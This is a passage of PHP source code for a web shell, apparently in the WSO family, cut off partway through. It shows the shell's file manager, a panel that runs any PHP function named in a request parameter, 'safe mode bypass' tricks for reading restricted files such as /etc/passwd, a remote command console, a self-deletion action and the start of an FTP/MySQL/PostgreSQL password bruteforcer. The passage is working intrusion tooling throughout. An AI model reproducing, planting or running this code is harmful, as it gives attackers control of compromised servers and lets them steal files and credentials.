  635. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  636. $l = $l?0:1;
  637. }
  638. ?>
  639. <tr><td colspan=7>
  640. <input type=hidden name=a value='FilesMan'>
  641. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  642. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  643. <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr>
  644. </form></table></div>
  645. <?php
  646. printFooter();
  647. }
  648. function actionStringTools() {
  649. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  650. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  651. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
  652. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  653. if(isset($_POST['ajax'])) {
  654. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  655. ob_start();
  656. if(function_exists($_POST['p1']))
  657. echo $_POST['p1']($_POST['p2']);
  658. $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  659. echo strlen($temp), "\n", $temp;
  660. exit;
  661. }
  662. printHeader();
  663. echo '<h1>String conversions</h1><div class=content>';
  664. $stringTools = array(
  665. 'Base64 encode' => 'base64_encode',
  666. 'Base64 decode' => 'base64_decode',
  667. 'Url encode' => 'urlencode',
  668. 'Url decode' => 'urldecode',
  669. 'Full urlencode' => 'full_urlencode',
  670. 'md5 hash' => 'md5',
  671. 'sha1 hash' => 'sha1',
  672. 'crypt' => 'crypt',
  673. 'CRC32' => 'crc32',
  674. 'ASCII to HEX' => 'ascii2hex',
  675. 'HEX to ASCII' => 'hex2ascii',
  676. 'HEX to DEC' => 'hexdec',
  677. 'HEX to BIN' => 'hex2bin',
  678. 'DEC to HEX' => 'dechex',
  679. 'DEC to BIN' => 'decbin',
  680. 'BIN to HEX' => 'bin2hex',
  681. 'BIN to DEC' => 'bindec',
  682. 'String to lower case' => 'strtolower',
  683. 'String to upper case' => 'strtoupper',
  684. 'Htmlspecialchars' => 'htmlspecialchars',
  685. 'String length' => 'strlen',
  686. );
  687. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  688. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  689. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  690. foreach($stringTools as $k => $v)
  691. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  692. echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX
  693. <textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
  694. if(!empty($_POST['p1'])) {
  695. if(function_exists($_POST['p1']))
  696. echo htmlspecialchars($_POST['p1']($_POST['p2']));
  697. }
  698. echo"</pre></div>";
  699. ?>
  700. <h1>Search for hash:</h1><div class=content>
  701. <form method='post' target='_blank' name="hf">
  702. <input type="text" name="hash" style="width:200px;">
  703. <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()">
  704. <input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()">
  705. <input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()">
  706. <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()">
  707. <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()">
  708. </form>
  709. </div>
  710. <?php
  711. printFooter();
  712. }
  713. function actionFilesTools() {
  714. if( isset($_POST['p1']) )
  715. $_POST['p1'] = urldecode($_POST['p1']);
  716. if(@$_POST['p2']=='download') {
  717. if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
  718. ob_start("ob_gzhandler", 4096);
  719. header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  720. if (function_exists("mime_content_type")) {
  721. $type = @mime_content_type($_POST['p1']);
  722. header("Content-Type: ".$type);
  723. }
  724. $fp = @fopen($_POST['p1'], "r");
  725. if($fp) {
  726. while(!@feof($fp))
  727. echo @fread($fp, 1024);
  728. fclose($fp);
  729. }
  730. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
  731. }
  732. exit;
  733. }
  734. if( @$_POST['p2'] == 'mkfile' ) {
  735. if(!file_exists($_POST['p1'])) {
  736. $fp = @fopen($_POST['p1'], 'w');
  737. if($fp) {
  738. $_POST['p2'] = "edit";
  739. fclose($fp);
  740. }
  741. }
  742. }
  743. printHeader();
  744. echo '<h1>File tools</h1><div class=content>';
  745. if( !file_exists(@$_POST['p1']) ) {
  746. echo 'File not exists';
  747. printFooter();
  748. return;
  749. }
  750. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  751. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
  752. echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'
  753. ';
  754. echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'
  755. ';
  756. if( empty($_POST['p2']) )
  757. $_POST['p2'] = 'view';
  758. if( is_file($_POST['p1']) )
  759. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
  760. else
  761. $m = array('Chmod', 'Rename', 'Touch');
  762. foreach($m as $v)
  763. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  764. echo '
  765. ';
  766. switch($_POST['p2']) {
  767. case 'view':
  768. echo '<pre class=ml1>';
  769. $fp = @fopen($_POST['p1'], 'r');
  770. if($fp) {
  771. while( !@feof($fp) )
  772. echo htmlspecialchars(@fread($fp, 1024));
  773. @fclose($fp);
  774. }
  775. echo '</pre>';
  776. break;
  777. case 'highlight':
  778. if( is_readable($_POST['p1']) ) {
  779. echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
  780. $code = highlight_file($_POST['p1'],true);
  781. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
  782. }
  783. break;
  784. case 'chmod':
  785. if( !empty($_POST['p3']) ) {
  786. $perms = 0;
  787. for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  788. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  789. if(!@chmod($_POST['p1'], $perms))
  790. echo 'Can\'t set permissions!
  791. <script>document.mf.p3.value="";</script>';
  792. else
  793. die('<script>g(null,null,null,null,"")</script>');
  794. }
  795. echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
  796. break;
  797. case 'edit':
  798. if( !is_writable($_POST['p1'])) {
  799. echo 'File isn\'t writeable';
  800. break;
  801. }
  802. if( !empty($_POST['p3']) ) {
  803. @file_put_contents($_POST['p1'],$_POST['p3']);
  804. echo 'Saved!
  805. <script>document.mf.p3.value="";</script>';
  806. }
  807. echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
  808. $fp = @fopen($_POST['p1'], 'r');
  809. if($fp) {
  810. while( !@feof($fp) )
  811. echo htmlspecialchars(@fread($fp, 1024));
  812. @fclose($fp);
  813. }
  814. echo '</textarea><input type=submit value=">>"></form>';
  815. break;
  816. case 'hexdump':
  817. $c = @file_get_contents($_POST['p1']);
  818. $n = 0;
  819. $h = array('00000000
  820. ','','');
  821. $len = strlen($c);
  822. for ($i=0; $i<$len; ++$i) {
  823. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  824. switch ( ord($c[$i]) ) {
  825. case 0: $h[2] .= ' '; break;
  826. case 9: $h[2] .= ' '; break;
  827. case 10: $h[2] .= ' '; break;
  828. case 13: $h[2] .= ' '; break;
  829. default: $h[2] .= $c[$i]; break;
  830. }
  831. $n++;
  832. if ($n == 32) {
  833. $n = 0;
  834. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
  835. ';}
  836. $h[1] .= '
  837. ';
  838. $h[2] .= "\n";
  839. }
  840. }
  841. echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  842. break;
  843. case 'rename':
  844. if( !empty($_POST['p3']) ) {
  845. if(!@rename($_POST['p1'], $_POST['p3']))
  846. echo 'Can\'t rename!
  847. <script>document.mf.p3.value="";</script>';
  848. else
  849. die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  850. }
  851. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
  852. break;
  853. case 'touch':
  854. if( !empty($_POST['p3']) ) {
  855. $time = strtotime($_POST['p3']);
  856. if($time) {
  857. if(@touch($_POST['p1'],$time,$time))
  858. die('<script>g(null,null,null,null,"")</script>');
  859. else {
  860. echo 'Fail!<script>document.mf.p3.value="";</script>';
  861. }
  862. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
  863. }
  864. echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
  865. break;
  866. case 'mkfile':
  867. break;
  868. }
  869. echo '</div>';
  870. printFooter();
  871. }
  872. function actionSafeMode() {
  873. $temp='';
  874. ob_start();
  875. switch($_POST['p1']) {
  876. case 1:
  877. $temp=@tempnam($test, 'cx');
  878. if(@copy("compress.zlib://".$_POST['p2'], $temp)){
  879. echo @file_get_contents($temp);
  880. unlink($temp);
  881. } else
  882. echo 'Sorry... Can\'t open file';
  883. break;
  884. case 2:
  885. $files = glob($_POST['p2'].'*');
  886. if( is_array($files) )
  887. foreach ($files as $filename)
  888. echo $filename."\n";
  889. break;
  890. case 3:
  891. $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
  892. curl_exec($ch);
  893. break;
  894. case 4:
  895. ini_restore("safe_mode");
  896. ini_restore("open_basedir");
  897. include($_POST['p2']);
  898. break;
  899. case 5:
  900. for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
  901. $uid = @posix_getpwuid($_POST['p2']);
  902. if ($uid)
  903. echo join(':',$uid)."\n";
  904. }
  905. break;
  906. case 6:
  907. if(!function_exists('imap_open'))break;
  908. $stream = imap_open($_POST['p2'], "", "");
  909. if ($stream == FALSE)
  910. break;
  911. echo imap_body($stream, 1);
  912. imap_close($stream);
  913. break;
  914. }
  915. $temp = ob_get_clean();
  916. printHeader();
  917. echo '<h1>Safe mode bypass</h1><div class=content>';
  918. echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>
  919. <span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>
  920. <span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>
  921. <span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>
  922. <span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>
  923. <span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
  924. if($temp)
  925. echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
  926. echo '</div>';
  927. printFooter();
  928. }
  929. function actionConsole() {
  930. if(isset($_POST['ajax'])) {
  931. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  932. ob_start();
  933. echo "document.cf.cmd.value='';\n";
  934. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
  935. if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
  936. if(@chdir($match[1])) {
  937. $GLOBALS['cwd'] = @getcwd();
  938. echo "document.mf.c.value='".$GLOBALS['cwd']."';";
  939. }
  940. }
  941. echo "document.cf.output.value+='".$temp."';";
  942. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
  943. $temp = ob_get_clean();
  944. echo strlen($temp), "\n", $temp;
  945. exit;
  946. }
  947. printHeader();
  948. ?>
  949. <script>
  950. if(window.Event) window.captureEvents(Event.KEYDOWN);
  951. var cmds = new Array("");
  952. var cur = 0;
  953. function kp(e) {
  954. var n = (window.Event) ? e.which : e.keyCode;
  955. if(n == 38) {
  956. cur--;
  957. if(cur>=0)
  958. document.cf.cmd.value = cmds[cur];
  959. else
  960. cur++;
  961. } else if(n == 40) {
  962. cur++;
  963. if(cur < cmds.length)
  964. document.cf.cmd.value = cmds[cur];
  965. else
  966. cur--;
  967. }
  968. }
  969. function add(cmd) {
  970. cmds.pop();
  971. cmds.push(cmd);
  972. cmds.push("");
  973. cur = cmds.length-1;
  974. }
  975. </script>
  976. <?php
  977. echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
  978. foreach($GLOBALS['aliases'] as $n => $v) {
  979. if($v == '') {
  980. echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  981. continue;
  982. }
  983. echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  984. }
  985. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  986. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  987. echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX
  988. <textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
  989. if(!empty($_POST['p1'])) {
  990. echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
  991. }
  992. echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
  993. echo '</form></div><script>document.cf.cmd.focus();</script>';
  994. printFooter();
  995. }
  996. function actionLogout() {
  997. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  998. echo 'bye!';
  999. }
  1000. function actionSelfRemove() {
  1001. printHeader();
  1002. if($_POST['p1'] == 'yes') {
  1003. if(@unlink(SELF_PATH))
  1004. die('Shell has been removed');
  1005. else
  1006. echo 'unlink error!';
  1007. }
  1008. echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?
  1009. <a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
  1010. printFooter();
  1011. }
  1012. function actionBruteforce() {
  1013. printHeader();
  1014. if( isset($_POST['proto']) ) {
  1015. echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'
  1016. ';
  1017. if( $_POST['proto'] == 'ftp' ) {
  1018. function bruteForce($ip,$port,$login,$pass) {
  1019. $fp = @ftp_connect($ip, $port?$port:21);
  1020. if(!$fp) return false;
  1021. $res = @ftp_login($fp, $login, $pass);
  1022. @ftp_close($fp);
  1023. return $res;
  1024. }
  1025. } elseif( $_POST['proto'] == 'mysql' ) {
  1026. function bruteForce($ip,$port,$login,$pass) {
  1027. $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
  1028. @mysql_close($res);
  1029. return $res;
  1030. }
  1031. } elseif( $_POST['proto'] == 'pgsql' ) {
  1032. function bruteForce($ip,$port,$login,$pass) {

Large files files are truncated, but you can click here to view the full file